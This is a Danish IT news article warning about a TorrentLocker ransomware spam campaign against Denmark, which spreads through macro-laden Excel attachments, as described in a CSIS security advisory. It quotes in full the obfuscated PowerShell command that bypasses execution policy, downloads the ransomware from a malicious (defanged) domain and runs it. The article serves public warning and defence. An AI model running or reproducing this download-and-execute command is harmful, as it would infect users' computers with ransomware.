Danmark ramt af nyt ransomware-angreb: Du skal ikke åbne denne mail

Danmark rammes i disse dage af en bølge af ondsindet ransomware, der kan låse din computers filer.

Artikel top billede

Danmark er mål for endnu en spamkampagne fra it-kriminelle, der bærer en ransomware i Torrentlocker-familien.

Det skriver sikkerhedsfirmaet CSIS i en sikkerhedsadvarsel.

Den ondsindede email ligner de fleste andre spam-emails for tiden med en tilsyneladende personlig besked på dansk og et tilknyttet Excel-dokument.

Hvis denne fil åbnes af en uforsigtig modtager og får en tilknyttet makrokode aktiveret ved at slå Excels beskyttelsestilstand fra, vil brugeren ende med en krypteret computer.

Du kan se et eksempel på mailen i toppen af artiklen. 

Aktiveres automatisk 

Makrokoden henter automatisk selve ransomware-programmet ned fra et ondsindet domæne, der via Windows' powershell-framework henter ransomware i Torrentlocker-klassen ned og afvikler programmet.

Det vil resultere i en låst computer og formodentligt et krav om en løsesum.

Funktionen ses udført via følgende powershell i en sikret form fra CSIS:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.exE -ExeCuTiONPoliCY BYpaSS -nOProfilE -WIndoWsTyle hiddeN (nEw-objeCT SySTEM.NET.WeBcLIeNt).dOWnLoadFIle('http://ltmp.applepice[.]pl/file/set.rte','C:\Users\[%brugerkonto%]\AppData\Roaming.eXE');staRT-PrOcESS 'C:\Users\[%brugerkonto%]\AppData\Roaming.EXe'

Alle bør derfor være opmærksomme, hvis de modtager en mail med et enkeltstående xls-dokument, der ikke giver mening, og særligt hvis det kommer fra en ukendt email-adresse.

Angrebet minder i høj grad som et lignende angreb fra sidste uge, hvor ransomwaren blev aktiveret af en vedhæftet zip-fil.

Det fik i sidste uge CSIS til at højne sin trusselvurdering til 4 ud af 5.  

Læs også: Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

Læses lige nu

    Netcompany A/S

    Linux Operations Engineer

    Københavnsområdet

    AL Sydbank

    Automation Developer - Digital & Processes

    Københavnsområdet

    Forsvarsministeriets Materiel- og Indkøbsstyrelse

    Unified Communications specialist til IT-Operations i Cyberdivisionen

    Københavnsområdet

    Navnenyt fra it-Danmark

    Elbek & Vejrup A/S har pr. 1. juni 2026 ansat Mikkel Bernt Buchvardt som AI Architect & Product Manager. Han skal især beskæftige sig med udviklingen af AI-Services og AI-Agenter i og omkring Business Central. Han kommer fra en stilling som Lead Data & Analytics hos IBM. Han er uddannet MSc. i softwareudvikling fra ITU. Han har tidligere beskæftiget sig med Data og BI hos KMD og Seges Innovation. Nyt job

    Mikkel Bernt Buchvardt

    Elbek & Vejrup A/S

    Lector ApS har pr. 9. juli 2026 ansat Simeon Dimitrov som IT-konsulent i Lectors TeamShare-gruppe. Han skal især beskæftige sig med cloud og infrastruktur samt design og optimering af Lectors infrastruktur og løsninger. Han kommer fra en stilling som DevOps Engineer hos Kraftvaerk. Han har tidligere beskæftiget sig med Azure og onprem infrastruktur, automatisering, implementering og optimering af cloudløsninger. Nyt job

    Simeon Dimitrov

    Lector ApS

    Oliver Dirks-Steinmoen, softwareudvikler hos Folketingets administration, har pr. 30. juni 2026 fuldført uddannelsen Master i it, linjen i softwarekonstruktion på Aarhus Universitet via It-vest-samarbejdet. Færdiggjort uddannelse

    Oliver Dirks-Steinmoen

    Folketingets administration

    Immeo har pr. 1. maj 2026 ansat Sofie Amalie Buur som Consultant. Hun kommer fra en stilling som Frontend Engineer & UI/UX Designer hos Valyrion. Hun er uddannet Cand.it. Softwaredesign ved ITU. Nyt job